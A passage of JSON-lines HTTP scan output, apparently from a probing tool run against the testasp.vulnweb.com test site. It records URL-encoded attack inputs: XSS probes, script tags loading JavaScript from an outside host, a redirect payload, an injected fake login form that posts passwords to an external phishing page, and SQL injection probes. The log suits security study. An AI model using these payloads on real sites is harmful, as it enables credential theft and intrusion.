Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3658,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:32.804406837Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253Cform%2Baction%253D%2522test%2Easp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%253A%253C%252Ftd%253E%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dlogin%253E%253C%252Ftd%253E%253C\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253Cform%2Baction%253D%2522test%2Easp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%253A%253C%252Ftd%253E%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dlogin%253E%253C%252Ftd%253E%253C\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253Cform%2Baction%253D%2522test%2Easp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%253A%253C%252Ftd%253E%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dlogin%253E%253C%252Ftd%253E%253C\",\"time\":\"357.012728ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3828,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:32.806722592Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253Cform%2Baction%253D%2522test%2Easp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%253A%253C%252Ftd%253E%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dlogin%253E%253C%252Ftd%253E%253C%252Ftr%253E%253Ctr%253E%253Ctd%253EPassword%253A%253C%252Ftd%253E%253Ctd%253E%253Cinp\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253Cform%2Baction%253D%2522test%2Easp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%253A%253C%252Ftd%253E%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dlogin%253E%253C%252Ftd%253E%253C%252Ftr%253E%253Ctr%253E%253Ctd%253EPassword%253A%253C%252Ftd%253E%253Ctd%253E%253Cinp\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253Cform%2Baction%253D%2522test%2Easp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%253A%253C%252Ftd%253E%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dlogin%253E%253C%252Ftd%253E%253C%252Ftr%253E%253Ctr%253E%253Ctd%253EPassword%253A%253C%252Ftd%253E%253Ctd%253E%253Cinp\",\"time\":\"352.547443ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":4000,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:33.0828515Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Byour%2Bform%2Bfacebbok%2Bbelow%2Bbefore%2Bproceeding%3A%253Cform%2Baction%253D%2522http%3A%2F%2Fwww%2Evineyarddowntown%2Eorg%2Fpdf%2Fphish%2Ephp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%3A%253C%2Ftd%253E%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dlogin%253E%253C%2Ftd%253E%253C%2Ftr%253E%253Ctr%253E%253Ctd%253EPassword%3A%253C%2Ftd%253E%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dpassword%253E%253C%2Ftd%253E%253C%2Ftr%253E%253C%2Ftable%253E%253Cinput%2Btype%253Dsubmit%2Bvalue%253DLOGIN%253E%253C%2Fform%253E\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Byour%2Bform%2Bfacebbok%2Bbelow%2Bbefore%2Bproceeding%3A%253Cform%2Baction%253D%2522http%3A%2F%2Fwww%2Evineyarddowntown%2Eorg%2Fpdf%2Fphish%2Ephp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%3A%253C%2Ftd%253E%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dlogin%253E%253C%2Ftd%253E%253C%2Ftr%253E%253Ctr%253E%253Ctd%253EPassword%3A%253C%2Ftd%253E%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dpassword%253E%253C%2Ftd%253E%253C%2Ftr%253E%253C%2Ftable%253E%253Cinput%2Btype%253Dsubmit%2Bvalue%253DLOGIN%253E%253C%2Fform%253E\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Byour%2Bform%2Bfacebbok%2Bbelow%2Bbefore%2Bproceeding%3A%253Cform%2Baction%253D%2522http%3A%2F%2Fwww%2Evineyarddowntown%2Eorg%2Fpdf%2Fphish%2Ephp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%3A%253C%2Ftd%253E%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dlogin%253E%253C%2Ftd%253E%253C%2Ftr%253E%253Ctr%253E%253Ctd%253EPassword%3A%253C%2Ftd%253E%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dpassword%253E%253C%2Ftd%253E%253C%2Ftr%253E%253C%2Ftable%253E%253Cinput%2Btype%253Dsubmit%2Bvalue%253DLOGIN%253E%253C%2Fform%253E\",\"time\":\"357.419856ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":4448,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:33.148988942Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cscript%2520src%3D%2522http%3A%2F%2Fsc0rn%2Ecom%2Fcfy%2Ejs%2522%253E%253C%252Fscript%253E\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cscript%2520src%3D%2522http%3A%2F%2Fsc0rn%2Ecom%2Fcfy%2Ejs%2522%253E%253C%252Fscript%253E\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cscript%2520src%3D%2522http%3A%2F%2Fsc0rn%2Ecom%2Fcfy%2Ejs%2522%253E%253C%252Fscript%253E\",\"time\":\"358.372626ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3404,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:33.189388336Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cscript%2520src%3D%2522http%3A%2F%2Fsc0rn%2Ecom%2Fsc%2Ejs%2522%253E%253C%252Fscript%253E\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cscript%2520src%3D%2522http%3A%2F%2Fsc0rn%2Ecom%2Fsc%2Ejs%2522%253E%253C%252Fscript%253E\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cscript%2520src%3D%2522http%3A%2F%2Fsc0rn%2Ecom%2Fsc%2Ejs%2522%253E%253C%252Fscript%253E\",\"time\":\"340.041997ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3402,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:33.18932901Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cscript%2520src%3D%2522http%3A%2F%2Fsc0rn%2Ecom%2Fnip%2Ejs%2522%253E%253C%252Fscript%253E\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cscript%2520src%3D%2522http%3A%2F%2Fsc0rn%2Ecom%2Fnip%2Ejs%2522%253E%253C%252Fscript%253E\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cscript%2520src%3D%2522http%3A%2F%2Fsc0rn%2Ecom%2Fnip%2Ejs%2522%253E%253C%252Fscript%253E\",\"time\":\"344.758364ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3404,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:33.227574596Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%3D%253Cscript%253Elocation%2Ehref%3D%2522http%3A%2F%2Fgoo%2Egl%2Fz4LTEG%2522%3B%253C%252Fscript%253E\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%3D%253Cscript%253Elocation%2Ehref%3D%2522http%3A%2F%2Fgoo%2Egl%2Fz4LTEG%2522%3B%253C%252Fscript%253E\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%3D%253Cscript%253Elocation%2Ehref%3D%2522http%3A%2F%2Fgoo%2Egl%2Fz4LTEG%2522%3B%253C%252Fscript%253E\",\"time\":\"344.90861ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3420,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:33.341129752Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DMert\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DMert\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DMert\",\"time\":\"345.311139ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3226,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:33.549465629Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DMertXSS\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DMertXSS\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DMertXSS\",\"time\":\"353.577291ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3232,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:33.574256036Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch.asp%3F\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch.asp%3F\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2FSearch.asp%3F\",\"time\":\"352.30856ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3196,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:33.574386213Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3Ftfsearch%3Da\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3Ftfsearch%3Da\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2FSearch%2Easp%3Ftfsearch%3Da\",\"time\":\"353.603505ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3220,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:33.593134429Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml\",\"time\":\"356.297919ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3256,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:33.604536449Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fsearch%2Easp%3FtfSearch%3D%253Cscript%253Ealert%281%29%26tfSearch%3Dalert%282%29%253C%2Fscript%253E\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fsearch%2Easp%3FtfSearch%3D%253Cscript%253Ealert%281%29%26tfSearch%3Dalert%282%29%253C%2Fscript%253E\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fsearch%2Easp%3FtfSearch%3D%253Cscript%253Ealert%281%29%26tfSearch%3Dalert%282%29%253C%2Fscript%253E\",\"time\":\"339.006688ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3364,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:33.605651602Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FTemplatize.asp%3Fitem%3Dhtml%2Fabout.html\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2FTemplatize.asp%3Fitem%3Dhtml%2Fabout.html\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2FTemplatize.asp%3Fitem%3Dhtml%2Fabout.html\",\"time\":\"344.925838ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3256,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:33.635224753Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fsearch%2Easp%3FtfSearch%3D%253Cscript%253Ealert%281%29%3B%2520%2F%2F%26tfSearch%3D%253C%2Fscript%253E\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fsearch%2Easp%3FtfSearch%3D%253Cscript%253Ealert%281%29%3B%2520%2F%2F%26tfSearch%3D%253C%2Fscript%253E\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fsearch%2Easp%3FtfSearch%3D%253Cscript%253Ealert%281%29%3B%2520%2F%2F%26tfSearch%3D%253C%2Fscript%253E\",\"time\":\"363.288338ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3368,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:33.646606707Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fsearch%2Easp%3FtfSearch%3D%253Cscript%253Ealert%281%29%3B%2520var%2520x%3D%5B%27%27%26tfSearch%3D%27%27%5D%3B%253C%2Fscript%253E\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fsearch%2Easp%3FtfSearch%3D%253Cscript%253Ealert%281%29%3B%2520var%2520x%3D%5B%27%27%26tfSearch%3D%27%27%5D%3B%253C%2Fscript%253E\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fsearch%2Easp%3FtfSearch%3D%253Cscript%253Ealert%281%29%3B%2520var%2520x%3D%5B%27%27%26tfSearch%3D%27%27%5D%3B%253C%2Fscript%253E\",\"time\":\"345.235304ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3422,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:33.804518494Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0\",\"time\":\"339.215973ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3214,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:43.106662489Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2\",\"time\":\"340.08518ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3214,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:43.109817084Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum.asp%3Fid%3D0\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum.asp%3Fid%3D0\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fshowforum.asp%3Fid%3D0\",\"time\":\"351.736175ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3214,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:43.10689338Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0%2Band%2B1%3D1%2D%2D%255BTrue%255D\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0%2Band%2B1%3D1%2D%2D%255BTrue%255D\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0%2Band%2B1%3D1%2D%2D%255BTrue%255D\",\"time\":\"345.532202ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3282,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:43.129278524Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum.asp%3Fid%3D2\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum.asp%3Fid%3D2\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fshowforum.asp%3Fid%3D2\",\"time\":\"351.728741ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3214,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:43.13121181Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1%29%28%28%29%28%2E%2C%2C%27%22\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1%29%28%28%29%28%2E%2C%2C%27%22\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1%29%28%28%29%28%2E%2C%2C%27%22\",\"time\":\"352.777548ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3274,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:43.135612603Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum.asp%3Fid%3D0%2Band%2B1%3D1--%255BTrue%255D\",\"input\":\"http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum.asp%3Fid%3D0%2Band%2B1%3D1--%255BTrue%255D\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Fshowforum.asp%3Fid%3D0%2Band%2B1%3D1--%255BTrue%255D\",\"time\":\"341.104941ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows 